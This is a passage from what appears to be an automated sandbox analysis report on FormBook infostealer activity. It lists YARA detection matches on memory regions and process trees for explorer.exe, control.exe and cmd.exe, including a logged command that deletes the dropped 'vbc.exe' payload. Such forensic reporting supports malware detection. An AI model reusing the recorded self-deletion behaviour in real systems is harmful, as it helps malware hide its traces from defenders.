                                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                          Analysis Process: explorer.exe PID: 1388 Parent PID: 2888

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:08:07:10
                                                                                                                                                                                          Start date:11/06/2021
                                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:
                                                                                                                                                                                          Imagebase:0xffca0000
                                                                                                                                                                                          File size:3229696 bytes
                                                                                                                                                                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          Analysis Process: control.exe PID: 2444 Parent PID: 1388

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:08:07:23
                                                                                                                                                                                          Start date:11/06/2021
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                          Imagebase:0xc20000
                                                                                                                                                                                          File size:113152 bytes
                                                                                                                                                                                          MD5 hash:9130377F87A2153FEAB900A00EA1EBFF
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                          Analysis Process: cmd.exe PID: 2264 Parent PID: 2444

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:08:07:28
                                                                                                                                                                                          Start date:11/06/2021
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                                                          Imagebase:0x4a600000
                                                                                                                                                                                          File size:302592 bytes
                                                                                                                                                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          Disassembly

                                                                                                                                                                                          Code Analysis

                                                                                                                                                                                          Reset < >